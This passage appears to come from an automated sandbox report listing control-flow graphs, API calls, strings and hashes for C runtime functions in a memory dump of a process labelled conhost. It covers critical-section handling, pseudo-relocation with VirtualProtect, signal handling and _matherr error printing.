                                                            • Associated: 0000003A.00000002.3902452870.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000003A.00000002.3902485591.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000003A.00000002.3902509699.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_58_2_140000000_conhost.jbxd
                                                            Similarity
                                                            • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                            • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                            • API String ID: 2595394609-2123141913
                                                            • Opcode ID: 094bdae0b17e80658d8c188e2262ef7b1f16cf2132fe40d87895d5e108269ff3
                                                            • Instruction ID: 240c236c852051f81e990fb491e53041d7c2660f74aafb1d04c17bd7f98d0633
                                                            • Opcode Fuzzy Hash: 094bdae0b17e80658d8c188e2262ef7b1f16cf2132fe40d87895d5e108269ff3
                                                            • Instruction Fuzzy Hash: 9B4124B1200A4582FA66DF57F884BE927A1F78DBC4F554126AF0E877B1DA38C58AC700

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 441 140002104-14000210b 442 140002111-140002128 EnterCriticalSection 441->442 443 140002218-140002221 441->443 444 14000220b-140002212 LeaveCriticalSection 442->444 445 14000212e-14000213c 442->445 446 140002272-140002280 443->446 447 140002223-14000222d 443->447 444->443 448 14000214d-140002159 TlsGetValue GetLastError 445->448 449 140002241-140002263 DeleteCriticalSection 447->449 450 14000222f 447->450 451 14000215b-14000215e 448->451 452 140002140-140002147 448->452 449->446 453 140002230-14000223f free 450->453 451->452 454 140002160-14000216d 451->454 452->444 452->448 453->449 453->453 454->452
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000003A.00000002.3902415484.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                            • Associated: 0000003A.00000002.3902381941.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000003A.00000002.3902452870.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000003A.00000002.3902485591.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000003A.00000002.3902509699.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_58_2_140000000_conhost.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                            • String ID:
                                                            • API String ID: 3326252324-0
                                                            • Opcode ID: a18f4165d0410a90581175361762af6a0a36e3a04d3aaffd59d482b3ba306e50
                                                            • Instruction ID: 2b853467ab7d4d098088ebecf48d6c2f8c3e318a46ea857c988f04f4070b7435
                                                            • Opcode Fuzzy Hash: a18f4165d0410a90581175361762af6a0a36e3a04d3aaffd59d482b3ba306e50
                                                            • Instruction Fuzzy Hash: EC21F5B1205A1192FA2BDB53FD543E823A5BB2DBD0F444021FF5A57AB4DB78C9868700

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 456 140001e10-140001e2d 457 140001e3e-140001e48 456->457 458 140001e2f-140001e38 456->458 460 140001ea3-140001ea8 457->460 461 140001e4a-140001e53 457->461 458->457 459 140001f60-140001f69 458->459 460->459 464 140001eae-140001eb3 460->464 462 140001e55-140001e60 461->462 463 140001ecc-140001ed1 461->463 462->460 467 140001f23-140001f2d 463->467 468 140001ed3-140001ee2 signal 463->468 465 140001eb5-140001eba 464->465 466 140001efb-140001f0a call 140005ef0 464->466 465->459 472 140001ec0 465->472 466->467 477 140001f0c-140001f10 466->477 470 140001f43-140001f45 467->470 471 140001f2f-140001f3f 467->471 468->467 473 140001ee4-140001ee8 468->473 470->459 471->470 472->467 475 140001eea-140001ef9 signal 473->475 476 140001f4e-140001f53 473->476 475->459 478 140001f5a 476->478 479 140001f12-140001f21 signal 477->479 480 140001f55 477->480 478->459 479->459 480->478
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000003A.00000002.3902415484.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                            • Associated: 0000003A.00000002.3902381941.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000003A.00000002.3902452870.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000003A.00000002.3902485591.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000003A.00000002.3902509699.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_58_2_140000000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CCG
                                                            • API String ID: 0-1584390748
                                                            • Opcode ID: bf3afcba1fae3b1d4280eb138e146465b8fbfc907039b8d80c3aec288ead6300
                                                            • Instruction ID: 31a3df70ab0bd5562d929675b7d5370fa4ddfd7c9e18d6edc0b2086831c455e4
                                                            • Opcode Fuzzy Hash: bf3afcba1fae3b1d4280eb138e146465b8fbfc907039b8d80c3aec288ead6300
                                                            • Instruction Fuzzy Hash: ED2189B1A0014542FA7BDA2BF5843FA1182ABCD7E4F248135BF1A433F5DE3888828241

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 481 140001880-14000189c 482 1400018a2-1400018f9 call 140002420 call 140002660 481->482 483 140001a0f-140001a1f 481->483 482->483 488 1400018ff-140001910 482->488 489 140001912-14000191c 488->489 490 14000193e-140001941 488->490 491 14000194d-140001954 489->491 492 14000191e-140001929 489->492 490->491 493 140001943-140001947 490->493 496 140001956-140001961 491->496 497 14000199e-1400019a6 491->497 492->491 494 14000192b-14000193a 492->494 493->491 495 140001a20-140001a26 493->495 494->490 498 140001b87-140001b98 call 140001d40 495->498 499 140001a2c-140001a37 495->499 500 140001970-14000199c call 140001ba0 496->500 497->483 501 1400019a8-1400019c1 497->501 499->497 502 140001a3d-140001a5f 499->502 500->497 505 1400019df-1400019e7 501->505 506 140001a7d-140001a97 502->506 509 1400019e9-140001a0d VirtualProtect 505->509 510 1400019d0-1400019dd 505->510 511 140001b74-140001b82 call 140001d40 506->511 512 140001a9d-140001afa 506->512 509->510 510->483 510->505 511->498 518 140001b22-140001b26 512->518 519 140001afc-140001b0e 512->519 522 140001b2c-140001b30 518->522 523 140001a70-140001a77 518->523 520 140001b5c-140001b6c 519->520 521 140001b10-140001b20 519->521 520->511 525 140001b6f call 140001d40 520->525 521->518 521->520 522->523 524 140001b36-140001b57 call 140001ba0 522->524 523->497 523->506 524->520 525->511
                                                            APIs
                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000003A.00000002.3902415484.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                            • Associated: 0000003A.00000002.3902381941.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000003A.00000002.3902452870.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000003A.00000002.3902485591.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000003A.00000002.3902509699.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_58_2_140000000_conhost.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                            • API String ID: 544645111-395989641
                                                            • Opcode ID: e98abfdb66b005230666cefb8bb138f343860c5c49056fd61f3a649d537574df
                                                            • Instruction ID: 233618597b7e535b24c227edc50f09a6d47624affa2d2e0b4ffcbdc956f57c6c
                                                            • Opcode Fuzzy Hash: e98abfdb66b005230666cefb8bb138f343860c5c49056fd61f3a649d537574df
                                                            • Instruction Fuzzy Hash: 2C5126B2710A44D6EB22CF67F8407E92762B75DBE8F448221EB19177B4CB38C986C700

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 529 140001800-140001810 530 140001812-140001822 529->530 531 140001824 529->531 532 14000182b-140001867 call 140002290 fprintf 530->532 531->532
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000003A.00000002.3902415484.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                            • Associated: 0000003A.00000002.3902381941.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000003A.00000002.3902452870.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000003A.00000002.3902485591.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000003A.00000002.3902509699.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_58_2_140000000_conhost.jbxd
                                                            Similarity
                                                            • API ID: fprintf
                                                            • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                            • API String ID: 383729395-3474627141
                                                            • Opcode ID: d66f37e81a20c217f8459b1684a986a2cdf377bf4add95fca66ac158cfd96480
                                                            • Instruction ID: 574c611a02d6c1612ca151b8e3957570b49d9af41173dbaee69110e7721d7622
                                                            • Opcode Fuzzy Hash: d66f37e81a20c217f8459b1684a986a2cdf377bf4add95fca66ac158cfd96480
                                                            • Instruction Fuzzy Hash: 65F09671614A8482E612EB76F9413ED6361E75D7C1F54D211FF4D67662DF38D282C300

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 535 14000219e-1400021a5 536 140002272-140002280 535->536 537 1400021ab-1400021c2 EnterCriticalSection 535->537 538 140002265-14000226c LeaveCriticalSection 537->538 539 1400021c8-1400021d6 537->539 538->536 540 1400021e9-1400021f5 TlsGetValue GetLastError 539->540 541 1400021f7-1400021fa 540->541 542 1400021e0-1400021e7 540->542 541->542 543 1400021fc-140002209 541->543 542->538 542->540 543->542
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000003A.00000002.3902415484.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                            • Associated: 0000003A.00000002.3902381941.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000003A.00000002.3902452870.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000003A.00000002.3902485591.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000003A.00000002.3902509699.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_58_2_140000000_conhost.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                            • String ID:
                                                            • API String ID: 682475483-0
                                                            • Opcode ID: 4584547b92fcb7da5dbf4dcde82a9c4324356799e97110344a2820feedb618a3
                                                            • Instruction ID: be3c70fffd8d417618adc2cc35d07084ba66c74b3674d4ef524ecab3b54e1663
                                                            • Opcode Fuzzy Hash: 4584547b92fcb7da5dbf4dcde82a9c4324356799e97110344a2820feedb618a3
                                                            • Instruction Fuzzy Hash: B601A4B5205A0192FA17DB53FD043E86365BB2CBD1F454021EF1953AB4DB7889968700